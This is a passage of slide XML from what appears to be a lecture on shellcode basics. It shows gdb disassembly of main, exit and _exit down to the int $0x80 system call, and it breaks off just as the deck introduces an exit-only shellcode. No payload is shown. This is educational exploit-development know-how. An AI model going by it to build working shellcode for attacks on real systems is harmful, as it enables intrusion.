              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Starting program: /ramdisk/var/tmp/exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Breakpoint 1, 0x0804836a in main ()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) disas main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Dump of assembler code for function main:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x08048364 &lt;main+0&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>%ebp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x08048365 &lt;main+1&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>%esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x08048367 &lt;main+3&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>sub</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x0804836a &lt;main+6&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0xfffffff0,%esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x0804836d &lt;main+9&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197960" y="2819520"/>
            <a:ext cx="4571640" cy="3382200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x08048372 &lt;main+14&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>sub</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>%eax,%esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x08048374 &lt;main+16&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x0,(%esp)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x0804837b &lt;main+23&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x8048284 &lt;exit&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb)</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="380880"/>
            <a:ext cx="7745040" cy="5744880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The last instruction in main() is the call to the exit(3) function. We will now see that exit(3), in turn, calls the _exit(2) function which will finally execute the system call, including the 0x80 interrupt:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156"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57" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{915191E1-51F1-4171-A131-5121A111F161}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380880" y="2209680"/>
            <a:ext cx="4571640" cy="4753080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) disas exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Dump of assembler code for function exit:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x40052aed &lt;exit+141&gt;: mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x40052af0 &lt;exit+144&gt;: mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>%eax,(%esp)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x40052af3 &lt;exit+147&gt;: call</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ced9c &lt;_exit&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) disas _exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Dump of assembler code for function _exit:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ced9c &lt;_exit+0&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181480" y="2209680"/>
            <a:ext cx="3885840" cy="4205160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x4(%esp),%ebx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda0 &lt;_exit+4&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0xfc,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda5 &lt;_exit+9&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda7 &lt;_exit+11&gt;: mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x1,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedac &lt;_exit+16&gt;: int</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedae &lt;_exit+18&gt;: hlt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedaf &lt;_exit+19&gt;: nop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb)</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="533520"/>
            <a:ext cx="7745040" cy="5592240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Therefore, a shellcode using the libc to indirectly execute the _exit(2) system call looks like:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161"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62" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
